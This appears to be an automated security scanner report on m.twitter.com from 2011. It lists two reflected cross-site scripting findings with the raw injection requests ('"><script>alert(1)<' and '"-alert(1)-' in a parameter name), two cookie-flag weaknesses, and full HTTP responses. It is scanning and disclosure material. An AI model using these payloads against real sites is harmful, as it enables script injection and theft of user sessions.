1. Cross-site scripting (reflected)
1.1. http://m.twitter.com/ [name of an arbitrarily supplied request parameter]
1.2. http://m.twitter.com/ [name of an arbitrarily supplied request parameter]
2. Cookie scoped to parent domain
3. Cookie without HttpOnly flag set
Severity: | High |
Confidence: | Certain |
Host: | http://m.twitter.com |
Path: | / |
GET /?6b33b"><script>alert(1)< Host: m.twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:25:14 GMT Server: hi Status: 200 OK X-Transaction: 1296224714-94384-53588 ETag: "34b49eac2e362d248cc Last-Modified: Fri, 28 Jan 2011 14:25:14 GMT X-Runtime: 0.01583 Content-Type: text/html; charset=utf-8 Content-Length: 707 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: k=173.193.214.243 Set-Cookie: guest_id=12962247142 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: admobuu=f554a8fb317c Set-Cookie: _twitter_sess=BAh7CT X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close <html><head> <script type="text/javascript"> //<![CDATA[ (function(g){var a=location.href.split("#! ...[SNIP]... <meta http-equiv="refresh" content="0;url=http:/ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://m.twitter.com |
Path: | / |
GET /?d526a"-alert(1)- Host: m.twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:25:15 GMT Server: hi Status: 200 OK X-Transaction: 1296224715-69419-9690 ETag: "4eb755daa827768b5ce Last-Modified: Fri, 28 Jan 2011 14:25:15 GMT X-Runtime: 0.02938 Content-Type: text/html; charset=utf-8 Content-Length: 662 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: k=173.193.214.243 Set-Cookie: guest_id=12962247153 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: admobuu=0d781e83e3ea Set-Cookie: _twitter_sess=BAh7CT X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close <html><head> <script type="text/javascript"> //<![CDATA[ (function(g){var a=location.href.split("#! //]]> ...[SNIP]... |
Severity: | Low |
Confidence: | Firm |
Host: | http://m.twitter.com |
Path: | / |
GET / HTTP/1.1 Host: m.twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:25:09 GMT Server: hi Status: 200 OK X-Transaction: 1296224709-38750-31363 ETag: "b7fd6e2139a6f270366 Last-Modified: Fri, 28 Jan 2011 14:25:09 GMT X-Runtime: 0.01143 Content-Type: text/html; charset=utf-8 Content-Length: 569 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: k=173.193.214.243 Set-Cookie: guest_id=12962247097 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: admobuu=f9cd9a008002 Set-Cookie: _twitter_sess=BAh7CT X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close <html><head> <script type="text/javascript"> //<![CDATA[ (function(g){var a=location.href.split("#! ...[SNIP]... |
Severity: | Low |
Confidence: | Firm |
Host: | http://m.twitter.com |
Path: | / |
GET / HTTP/1.1 Host: m.twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:25:09 GMT Server: hi Status: 200 OK X-Transaction: 1296224709-38750-31363 ETag: "b7fd6e2139a6f270366 Last-Modified: Fri, 28 Jan 2011 14:25:09 GMT X-Runtime: 0.01143 Content-Type: text/html; charset=utf-8 Content-Length: 569 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: k=173.193.214.243 Set-Cookie: guest_id=12962247097 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: admobuu=f9cd9a008002 Set-Cookie: _twitter_sess=BAh7CT X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close <html><head> <script type="text/javascript"> //<![CDATA[ (function(g){var a=location.href.split("#! ...[SNIP]... |